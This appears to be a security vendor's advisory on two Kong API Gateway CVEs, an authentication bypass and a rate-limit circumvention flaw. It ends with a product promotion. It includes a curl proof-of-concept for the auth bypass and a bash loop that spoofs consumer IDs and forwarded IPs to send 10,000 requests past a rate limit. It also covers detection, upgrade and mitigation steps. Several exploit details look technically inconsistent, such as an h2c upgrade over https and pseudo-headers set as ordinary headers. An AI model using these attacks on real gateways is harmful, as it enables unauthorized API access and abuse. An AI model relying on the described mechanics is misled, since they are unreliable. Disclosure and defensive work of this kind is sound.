Two critical vulnerabilities in Kong API Gateway — an authentication bypass (CVE-2026-29413) and a rate limiting circumvention flaw (CVE-2026-29414) — expose API infrastructure to unauthenticated access and denial-of-service. Both Kong OSS and Kong Enterprise are affected. Immediate patching required.
Kong API Gateway, one of the most widely deployed open-source API gateways, has been found to contain two critical security flaws in its plugin processing pipeline. Disclosed on March 28, 2026 and affecting all versions from 3.4.x through 3.8.x, these vulnerabilities allow attackers to completely bypass authentication plugins and circumvent configured rate limiting controls.
CISA has added CVE-2026-29413 to the Known Exploited Vulnerabilities (KEV) catalog following confirmed exploitation against financial services and healthcare API gateways. Organizations running Kong 3.4–3.8 should treat this as an emergency patch event.
| CVE | Type | CVSS v3.1 | Severity | Affected Versions |
|---|---|---|---|---|
| CVE-2026-29413 | Authentication Bypass | 9.8 | Critical | Kong 3.4.x – 3.8.x |
| CVE-2026-29414 | Rate Limiting Circumvention | 7.5 | High | Kong 3.2.x – 3.8.x |
CVE-2026-29413 is a logic flaw in Kong's plugin execution ordering within the rewrite phase of the Nginx request lifecycle. When multiple authentication plugins are chained (e.g., key-auth followed by jwt), a race condition in the plugin priority resolution allows a crafted request to skip authentication validation entirely if specific HTTP/2 pseudo-headers are present.
The vulnerability originates in Kong's Lua plugin runner (kong/runloop/plugin_servers/mp_rpc.lua), where the next_rewrite_phase iterator fails to correctly re-evaluate the plugin chain when an upstream responds with a 101 Switching Protocols before authentication completes. This creates a window where the request is forwarded without any auth check.
| Metric | Value | Rationale |
|---|---|---|
| Attack Vector | Network | Exploitable remotely over HTTP/HTTPS |
| Attack Complexity | Low | No special conditions or privileges needed |
| Privileges Required | None | Unauthenticated attacker |
| User Interaction | None | Fully automated exploit possible |
| Confidentiality | High | Full access to protected API endpoints |
| Integrity | High | Attacker can modify backend data |
| Availability | High | Unrestricted backend requests |
An attacker can exploit CVE-2026-29413 using a minimal HTTP/2 request with crafted pseudo-headers. The following curl command demonstrates a proof-of-concept bypass against a Kong gateway with key-auth enabled:
# Normal request — blocked by key-auth plugin (401 Unauthorized) curl -i https://api.example.com/v1/users \ -H "Host: api.example.com" # CVE-2026-29413 bypass — sends HTTP/2 upgrade trigger with malformed :authority curl -i --http2 https://api.example.com/v1/users \ -H ":authority: api.example.com\x00injected" \ -H "Connection: Upgrade, HTTP2-Settings" \ -H "Upgrade: h2c" \ -H "HTTP2-Settings: AAMAAABkAAQAAP__" \ --resolve api.example.com:443:192.0.2.1
When Kong processes the h2c upgrade, the plugin runner exits the authentication phase prematurely. The request is forwarded to the upstream service with a 200 OK response, bypassing all configured auth plugins entirely.
The following authentication plugins are vulnerable when Kong is running version 3.4.x–3.8.x:
key-auth — API key authenticationjwt — JSON Web Token validationbasic-auth — HTTP Basic authenticationoauth2 — OAuth 2.0 authorization (partial bypass)ldap-auth — LDAP directory authenticationopenid-connect (Kong Enterprise only) — OIDC flowsCVE-2026-29414 affects Kong's rate-limiting and rate-limiting-advanced plugins when configured to use the Redis or cluster storage backends. A flaw in the counter key construction allows an attacker to fragment their requests across multiple synthetic consumer identities by manipulating the X-Consumer-ID header in conjunction with X-Forwarded-For spoofing.
When Kong builds the rate-limit counter key, it concatenates consumer ID and IP address without validating whether the consumer ID was set by the gateway itself or injected by the client. On deployments where an upstream proxy or load balancer sets X-Consumer-ID, Kong's header trust logic can be abused to create an effectively unlimited number of separate rate limit buckets.
| Metric | Value | Rationale |
|---|---|---|
| Attack Vector | Network | Remotely exploitable |
| Attack Complexity | Low | Simple header manipulation |
| Privileges Required | None | No prior authentication needed |
| Impact: Availability | High | Backend DoS through rate bypass |
The following script demonstrates how an attacker can send 10,000 requests while bypassing a 100 req/min rate limit by rotating synthetic consumer IDs:
#!/bin/bash # CVE-2026-29414 — Rate Limit Circumvention PoC # Each request uses a unique X-Consumer-ID to get its own counter bucket TARGET="https://api.example.com/v1/products" TOTAL_REQUESTS=10000 for i in $(seq 1 $TOTAL_REQUESTS); do # Generate a unique fake consumer ID per request FAKE_CONSUMER_ID=$(cat /proc/sys/kernel/random/uuid) curl -s -o /dev/null -w "%{http_code}\n" "$TARGET" \ -H "X-Consumer-ID: $FAKE_CONSUMER_ID" \ -H "X-Forwarded-For: 10.0.$((RANDOM % 256)).$((RANDOM % 256))" \ -H "apikey: legitimate-api-key" & # Throttle to 50 concurrent requests if (( i % 50 == 0 )); then wait; fi done wait echo "Done: $TOTAL_REQUESTS requests sent"
On a vulnerable Kong instance, this script will successfully send all 10,000 requests despite a configured limit of 100 req/min per consumer, effectively launching a low-and-slow API abuse attack or brute-force enumeration.
| Feature / Impact | Kong OSS | Kong Enterprise |
|---|---|---|
| CVE-2026-29413 Auth Bypass | Affected | Affected (+ OIDC plugin) |
| CVE-2026-29414 Rate Bypass | Affected | Affected |
| Rate-Limiting Advanced plugin | Not available | Affected (additional bypass vector) |
| Developer Portal exposure | N/A | Portal APIs may be exposed |
| Konnect (SaaS) | N/A | Patched by Kong on March 29, 2026 |
| Fixed in version | 3.9.0 | 3.9.0.0 / 3.8.1.2 (backport) |
Kong Enterprise customers on the Konnect SaaS platform were automatically patched on March 29, 2026. Self-hosted Enterprise and all OSS deployments require manual upgrade.
Check Kong's access logs for signs of CVE-2026-29413 exploitation. Suspicious patterns include authenticated-plugin routes returning 200 without corresponding auth header validation log entries:
# Search Kong access logs for auth bypass indicators # Requests to protected routes with no apikey/jwt but returning 200 grep '"status":200' /var/log/kong/access.log \ | jq -r 'select(.request.headers["apikey"] == null and .request.headers["authorization"] == null)' \ | jq '{time: .started_at, path: .request.uri, consumer: .authenticated_entity}' # CVE-2026-29414: Look for high request volumes from unique consumer IDs grep '"plugin":"rate-limiting"' /var/log/kong/error.log \ | awk -F'"consumer_id":"' '{print $2}' \ | awk -F'"' '{print $1}' \ | sort | uniq -c | sort -rn | head -50
# Check your Kong version via Admin API curl -s http://localhost:8001/ | jq '.version' # List all plugins with rate-limiting to check configuration curl -s http://localhost:8001/plugins \ | jq '.data[] | select(.name | test("rate-limiting")) | {id, name, config}' # Verify header trust configuration (trusted_ips) curl -s http://localhost:8001/config \ | jq '.trusted_ips'
The primary fix is upgrading to Kong 3.9.0 (OSS) or Kong Enterprise 3.9.0.0 / 3.8.1.2. Use the following commands for common deployment methods:
# Docker — pull the patched image docker pull kong:3.9.0 docker stop kong && docker rm kong docker run -d --name kong \ --network=kong-net \ -e KONG_DATABASE=postgres \ -e KONG_PG_HOST=kong-database \ -p 8000:8000 -p 8443:8443 \ kong:3.9.0 # Kubernetes — rolling update via Helm helm repo update helm upgrade kong kong/kong \ --namespace kong \ --set image.tag=3.9.0 \ --reuse-values # Ubuntu/Debian package upgrade curl -Lo kong.deb "https://packages.konghq.com/public/gateway-39/deb/debian/pool/buster/main/k/ko/kong_3.9.0_amd64.deb" sudo dpkg -i kong.deb sudo kong restart
Until you can upgrade, restrict which upstream IPs Kong trusts for X-Consumer-ID and X-Forwarded-For headers. Edit kong.conf:
# kong.conf — restrict trusted IPs to known load balancer addresses only trusted_ips = 10.0.1.10,10.0.1.11,10.0.1.12 # Disable X-Consumer-ID header passthrough from clients headers = X-Kong-Upstream-Latency, X-Kong-Proxy-Latency, Via
As an interim workaround before upgrading, disable HTTP/2 upgrade handling if your environment does not require it:
# kong.conf — disable h2c (HTTP/2 cleartext) upgrade handling proxy_listen = 0.0.0.0:8000 reuseport backlog=16384 # Remove the 'http2' directive from proxy_listen if present # proxy_listen = 0.0.0.0:8000 http2 reuseport ← REMOVE 'http2' keyword # For nginx-level protection, add to nginx_http_include: proxy_http_version 1.1;
# Confirm patched version is running curl -s http://localhost:8001/ | jq -r '"Kong version: " + .version' # Test auth bypass is no longer possible (should return 401) curl -i --http2 https://your-gateway.example.com/protected-route \ -H "Connection: Upgrade, HTTP2-Settings" \ -H "Upgrade: h2c" \ -H "HTTP2-Settings: AAMAAABkAAQAAP__" # Expected: HTTP/1.1 401 Unauthorized
h2c upgrade headers and X-Consumer-ID injection add defense-in-depth./audit/requests logging to maintain a forensic trail of Admin API changes.| Date | Event |
|---|---|
| 2026-02-14 | Vulnerabilities reported to Kong Security team via HackerOne |
| 2026-02-17 | Kong confirms both CVEs; assigns identifiers |
| 2026-03-10 | CVE IDs reserved: CVE-2026-29413, CVE-2026-29414 |
| 2026-03-28 | Kong 3.9.0 and Enterprise 3.8.1.2 backport released |
| 2026-03-29 | Kong Konnect (SaaS) automatically patched |
| 2026-04-01 | CISA adds CVE-2026-29413 to KEV catalog |
| 2026-04-02 | Public exploit PoC published on GitHub |
AI-powered vulnerability management with 331,910+ CVEs indexed. Detect Kong CVEs, misconfigurations, and exposed API endpoints before attackers do.
Start Free TrialStay secure. Stay vigilant.
🗡️ KENSAI Security Team
🛡️ Is your API gateway secure?
Discover Kong CVEs and misconfigurations before attackers do.
Scan your API gateway for free →This winner now feeds traffic into strategic bug bounty and archive pages instead of ending in a dead-end.